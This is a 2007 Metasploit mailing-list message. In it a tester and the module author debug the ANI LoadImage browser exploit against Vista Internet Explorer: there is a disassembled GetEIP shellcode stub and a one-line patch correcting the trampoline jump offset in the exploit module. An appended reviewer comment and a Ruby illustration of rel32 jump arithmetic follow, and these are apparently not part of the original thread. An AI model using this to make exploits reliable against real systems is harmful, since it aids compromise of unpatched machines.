[framework] Metasploit vs ANI

mmiller at hick.org
Mon Apr 2 15:40:28 CDT 2007


On Mon, Apr 02, 2007 at 10:32:54PM +0200, Nicolas RUFF wrote:
> To HDM and Rhys: thanks for your explanations on the style sheet trick -
> I missed this one. There *is* a second connection to get the ANI file.
> 
> However, I still feel like there is a bug somewhere. My victim is Vista
> 32-bit English. I attached Olly to IEXPLORE and an access violation is
> triggered in the following block (which is clearly a GetEIP):
> 
> 02C80EF3   EB 0F                 JMP SHORT 02C80F04
> 02C80EF5   68 BC040000           PUSH 4BC
> 02C80EFA   59                    POP ECX
> 02C80EFB   5E                    POP ESI
> 02C80EFC   29CC                  SUB ESP,ECX
> 02C80EFE   89E7                  MOV EDI,ESP
> 02C80F00   F3:A4                 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
> 02C80F02   FFE4                  JMP ESP
> 02C80F04                         CALL 02C80EF5
> 
> This memory block belongs to:
> \Device\HarddiskVolume1\Users\[...]\Temporary Internet
> Files\Low\Content.IE5\BUURI5IQ\hMNjttkPdyba3xhJwbZa9FrbHegyoRkUeMVg74rfMvIceIwheWHyaB7zWJNzWKe5VoXHAAU47[1].zip
> 
> *However*, EIP value is 02C80EF4, so the sequence of bytes is
> interpreted as PUNPCKHBW instruction (nice one :). If I manually set EIP
> to 02C80EF3, exploit works fine.
> 
> There is some kind of "one-by-one" in the jump address - looks like you
> 0xCC'ed something :)

Thanks for the report, Nicolas.  I think you're right (although it's
pretty weird that this worked in my test environment).  

I'm not in a place to test this, but can you try this patch out and see if it
fixes the problem for you:

===================================================================
--- ani_loadimage_chunksize.rb  (revision 4626)
+++ ani_loadimage_chunksize.rb  (working copy)
@@ -283,7 +283,7 @@     
                        
                        # Replace the operand to the relative jump to point into the actual
                        # payload itself which comes after the riff chunk
-                       riff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 4].pack('V')
+                       riff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 5].pack('V')
                end
                
                # Place the RIFF chunk in front and off we go
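Review bot: -5 is the right constant in the changed line, because an E8/E9 rel32 instruction is 5 bytes (one opcode byte plus the 4-byte operand) and the CPU measures the displacement from the end of the instruction; with -4 the jump lands one byte past the start of the payload, which is exactly the EIP of 02C80EF4 instead of 02C80EF3 in the report (the `EB 0F` is then decoded from its second byte as `0F 68`, PUNPCKHBW). Suggest replacing the bare 5 with a named constant or a short comment ("5 = length of the rel32 jump") so the next edit does not reintroduce the -4. Minor: the operand is packed with 'V' (unsigned), which is fine while `riff.length - trampoline_doffset - 5` is positive, but a negative result would wrap silently rather than raise.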

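The displacement arithmetic behind that one-character patch, as an added example (my own illustration, not code from the module or from anyone in the thread): x86 CALL/JMP rel32 displacements are measured from the end of the 5-byte instruction, so subtracting 4 instead of 5 lands one byte past the intended start, which is the EIP of 02C80EF4 rather than 02C80EF3 that Nicolas reports. `SAMPLE_CHUNK`, `patch_trampoline` and the other names are constructed for illustration.

```ruby
REL32_LEN = 5  # opcode byte (E8 CALL / E9 JMP) + 4-byte signed displacement

# Displacement that makes a CALL/JMP rel32 located at insn_addr land on target.
# x86 measures rel32 from the address of the *next* instruction, hence + 5.
def rel32_operand(insn_addr, target)
  target - (insn_addr + REL32_LEN)
end

# Decode where the rel32 instruction at buf[off] transfers control; buf is
# assumed to be loaded at `base`. Returns the absolute landing address.
def rel32_target(buf, off, base = 0)
  opcode = buf.getbyte(off)
  raise "no CALL/JMP rel32 at offset #{off}" unless [0xE8, 0xE9].include?(opcode)
  disp = buf[off + 1, 4].unpack1('l<')   # signed little-endian rel32
  base + off + REL32_LEN + disp
end

# Mirror of the line the patch touches: the trampoline at trampoline_doffset
# must jump to the first byte after the chunk (buf.length). `adjust` is the
# constant in question: 4 in revision 4626, 5 after the patch.
def patch_trampoline(buf, trampoline_doffset, adjust)
  buf = buf.b  # work on a binary copy
  buf[trampoline_doffset + 1, 4] = [buf.length - trampoline_doffset - adjust].pack('V')
  buf
end

# Offset (into the chunk) that the patched trampoline actually reaches.
def landing_offset(buf, trampoline_doffset, adjust)
  rel32_target(patch_trampoline(buf, trampoline_doffset, adjust), trampoline_doffset)
end

# Constructed 16-byte stand-in for the chunk: NOPs with an E9 JMP rel32 at offset 8.
SAMPLE_CHUNK = ([0x90] * 8 + [0xE9, 0, 0, 0, 0] + [0x90] * 3).pack('C*')

if __FILE__ == $0
  puts "adjust 4 lands at offset #{landing_offset(SAMPLE_CHUNK, 8, 4)} (chunk length #{SAMPLE_CHUNK.length})"
  puts "adjust 5 lands at offset #{landing_offset(SAMPLE_CHUNK, 8, 5)}"
end
```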